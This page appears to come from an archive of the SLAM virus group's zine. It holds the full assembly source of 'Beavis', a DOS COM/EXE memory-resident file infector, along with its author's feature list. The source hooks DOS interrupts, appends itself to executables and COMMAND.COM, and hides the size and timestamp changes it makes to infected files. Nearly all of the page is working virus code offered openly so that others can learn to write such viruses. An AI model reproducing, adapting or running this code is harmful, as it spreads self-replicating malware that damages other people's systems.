Copy Link
Add to Bookmark
Report
SLAM3.023: The "Beavis" virus written by Virtual Daemon [SLAM]
The "Beavis" virus
written by Virtual Daemon
Description
Here you have my first COM/EXE TSR virus. I made him quite some time ago, so I think that the elite virus coders wont find anything here...
Sorry guys! :(
Anyway, I'm releasing the source code bcoz this might help somebody out there in learning how to do it. It's quite simple...
About the virus:
- COM/EXE TSR
- infection on 4bh (load or execute)
- size stealth on 11h/12h/4eh/4fh
- time stealth on 5700h (get file's time/date)
- int 24h handler (no errors will be displayed)
- save/restore file time/date/attributes
- infect COMMAND.COM too
Well, that's all... The virus doesn't have any payload or encryption system bcoz, like I said, this was my first EXE TSR virus! So, don't be too hard on it... There will be a better one! I promise! :-)
code segment
assume cs:code,ds:code,es:code
org 0
virus_start:
call findoff
findoff:
pop bp
sub bp,offset findoff
push ds ;DS=ES
push es
mov ax,'VD' ;check if the virus is already installed
int 21h
cmp cx,'DV'
je over
mov ah,4ah ;get largest block available
mov bx,0ffffh
int 21h
sub bx,(endheap-virus_start+15)/16+1 ;substract our virus
mov ah,4ah
int 21h
jc over
sub word ptr ds:[2],(endheap-virus_start+15)/16+1
mov ah,48h ;allocate memory
mov bx,(endheap-virus_start+15)/16
int 21h
jc over
push ax
pop es
dec ax
push ax
pop ds
mov al,'Z'
mov byte ptr ds:[0],al ;mark the MCB
mov ax,8
mov word ptr ds:[1],ax
push cs ;CS=DS
pop ds
xor di,di
mov cx,(heap-virus_start)/2+1
mov si,bp
rep movsw ;move the virus to RAM
xor ax,ax
mov ds,ax
push ds
lds ax,ds:[21h*4]
mov word ptr es:oldint21,ax
mov word ptr es:oldint21+2,ds
pop ds
mov word ptr ds:[21h*4],offset int21
mov ds:[21h*4+2],es
over:
pop es
pop ds ;DS=ES
cmp byte ptr cs:[infect_ext+bp],0 ;check if COM or EXE
je restore_EXE
restore_com:
lea si,[bp+offset jumpbuf] ;restore saved bytes
mov di,100h
push di
mov cx,3
repne movsb
retn
jumpbuf db 0cdh,20h,0
restore_exe:
mov ax,es
add ax,10h
add cs:[infcs+bp],ax
cli
mov sp,word ptr cs:[infsp+bp] ;restore sp:ss
add ax,word ptr cs:[infss+bp]
mov ss,ax
sti
xor ax,ax ;clear some registers
xor bx,bx
xor cx,cx
xor dx,dx
xor di,di
xor si,si
push cs:[infcs+bp]
push cs:[infip+bp]
xor bp,bp
retf
infip dw 00000h
infsp dw ?
infss dw ?
infcs dw 0fff0h
int24:
mov al,3
iret
int21:
cmp ax,'VD'
jne yeah
mov cx,'DV'
iret
yeah:
cmp ah,4bh
jne neah
jmp infect
neah:
cmp ah,11h
je stealth1
cmp ah,12h
je stealth1
cmp ah,4eh
je stealth2
cmp ah,4fh
je stealth2
cmp ax,5700h
jne exithandler
jmp stealth3
exithandler:
db 0eah
oldint21 dd ?
stealth1:
pushf
push cs
call exithandler
or al,0
jnz skip_dir
push ax bx es
mov ah,51h ;get the PSP in es:bx
int 21h
mov es,bx
cmp bx,es:[16h] ;check if infected
jnz error
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;get DTA area in es:bx
int 21h
pop ax
inc al
jnz no_ext
add bx,7
no_ext:
cmp word ptr es:[bx+1fh],0
jnz error
mov al,es:[bx+17h] ;check in it's one of our files
and al,1fh
xor al,1fh
jnz error
sub word ptr es:[bx+1dh],(heap-virus_start) ;substract our virus
sbb word ptr es:[bx+1fh],0
error:
pop es bx ax
skip_dir:
retf 2
stealth2:
pushf
push cs
call exithandler
jc no_files
pushf
push ax di es bx
mov ah,2fh ;get DTA area in es:bx
int 21h
mov al,es:[bx+16h] ;check if infected with our virus
and al,1fh
xor al,1fh
jnz not_inf
cmp word ptr es:[bx+1ah],(heap-virus_start)
ja hide
cmp word ptr es:[bx+1Ch],0
je not_inf
hide:
sub word ptr es:[bx+1ah],(heap-virus_start) ;substract our virus
sbb word ptr es:[bx+1ch],0
not_inf:
pop bx es di ax
popf
no_files:
retf 2
stealth3:
pushf
call dword ptr cs:[oldint21]
push cx
and cl,01fh ;infected by us?
xor cl,01fh
pop cx
jnz no_way
or cl,01fh ;stealth the time
no_way:
iret
shit:
retf 2
infect:
pushf
push ax bx cx dx si di bp ds es
push ds
push dx
mov ax,3524h ;save old Int 24h
int 21h
mov word ptr cs:[old_int24],bx
mov word ptr cs:[old_int24+2],es
push cs
pop ds
lea dx,int24 ;put a new Int 24h handler
mov ax,2524h
int 21h
pop dx
pop ds
mov ax,4300h ;save attributes
int 21h
push ds
push dx
push cx
mov ax,4301h ;put archive only attributes
xor cx,cx
int 21h
mov ax,3d02h ;open the file for RW
pushf
call dword ptr cs:[oldint21]
xchg ax,bx
mov ax,5700h ;get the time
pushf
call dword ptr cs:[oldint21]
mov word ptr cs:[file_time],cx
mov word ptr cs:[file_date],dx
push cs cs
pop ds es ;CS=DS=ES
mov ah,3fh ;read from file the first 3 bytes
lea dx,header
mov cx,1ch
int 21h
mov byte ptr [infect_ext],1 ;mark as a COM file
mov ax,4202h ;go to EOF
xor cx,cx
cwd
int 21h
mov word ptr file_size,ax ;save file_size
mov word ptr file_size+2,dx
cmp word ptr header,'MZ' ;check if EXE
je infect_exe
cmp word ptr header,'ZM' ;could be inverted... who knows? ;)
je infect_exe
infect_com:
mov ax,word ptr file_size
cmp ax,65535-(endheap-virus_start) ;check if too small
jb go_on
jmp close_file
go_on:
mov cx,word ptr header+1 ;check if already infected
add cx,heap-virus_start+3
cmp ax,cx
jne no_inf
jmp close_file
no_inf:
mov di,offset jumpbuf ;build the new JMP
mov si,offset header
movsb
movsw
mov byte ptr [offset header],0e9h
sub ax,3
mov word ptr [offset header+1],ax
jmp write_virus
infect_exe:
cmp word ptr header+12h,'VD' ;check if already infected
je shake
cmp byte ptr header+18h,'@' ;check if it's a Windows EXE
je shake
cmp word ptr header+1ah,0 ;check if it's a Overlay EXE
jne shake
jmp oks
shake:
jmp close_file
oks:
mov ax,word ptr file_size
mov dx,word ptr file_size+2
push ax
push dx
mov cx,word ptr header+14h ;save IP
mov infip,cx
mov cx,word ptr header+16h ;save CS
mov infcs,cx
mov cx,word ptr header+10h ;save SP
mov infsp,cx
mov cx,word ptr header+0eh ;save SS
mov infss,cx
mov cx,16 ;let's do some calculs
div cx
sub ax,word ptr [header+8h]
mov word ptr [header+14h],dx
mov word ptr [header+16h],ax
add dx,offset endheap
mov word ptr [header+10h],dx
mov word ptr [header+0eh],ax
pop dx
pop ax
add ax,(heap-virus_start)
adc dx,0
mov cx,512 ;recalculate file length
div cx
mov word ptr [header+12h],'VD' ;mark as infected
mov word ptr [header+2],dx
inc ax
mov word ptr [header+4],ax
mov byte ptr [infect_ext],0 ;mark as a EXE infection
write_virus:
mov ah,40h ;write the virus to file
lea dx,virus_start
mov cx,heap-virus_start
int 21h
mov ax,4200h ;go to BOF
xor cx,cx
xor dx,dx
int 21h
cmp infect_ext,1 ;check if COM or EXE
je com_here
mov cx,1ch
jmp short do_it
com_here:
mov cx,3
do_it:
mov ah,40h ;write the new JMP
lea dx,header
int 21h
close_file:
mov ax,5701h
mov cx,word ptr cs:[file_time]
mov dx,word ptr cs:[file_date]
or cl,1fh ;mark for stealth
int 21h
mov ah,3eh ;close the file
int 21h
mov ax,4301h ;restore attributes
pop cx
pop dx
pop ds
int 21h
mov ds,word ptr cs:[old_int24+2]
mov dx,word ptr cs:[old_int24]
mov ax,2524h ;restore the Int 24h handler
int 21h
exit:
pop es ds bp di si dx cx bx ax
popf
jmp exithandler
old_int24 dd ?
virusname db 'Beavis',0
signature db '[VD/SLAM]'
infect_ext db 1
heap:
file_size dd ?
file_time dw ?
file_date dw ?
header db 1ch dup (?)
endheap:
code ends
end virus_start